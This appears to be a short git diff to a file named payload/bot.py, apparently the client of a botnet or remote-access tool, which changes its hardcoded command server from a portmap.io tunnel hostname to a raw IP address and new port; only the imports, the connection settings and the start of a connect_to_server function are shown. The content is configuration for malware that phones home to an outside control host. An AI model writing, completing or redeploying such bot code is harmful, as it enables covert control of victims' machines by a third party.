diff --git a/payload/bot.py b/payload/bot.py index 9f12a82..a7659ad 100644 --- a/payload/bot.py +++ b/payload/bot.py @@ -2,8 +2,8 @@ import socket import os import sys -SERVER_HOST = "jabarzad-34105.portmap.io" # Replace with server IP -SERVER_PORT = 34105 +SERVER_HOST = "178.63.100.123" # Replace with server IP +SERVER_PORT = 14006 def connect_to_server(bot_name):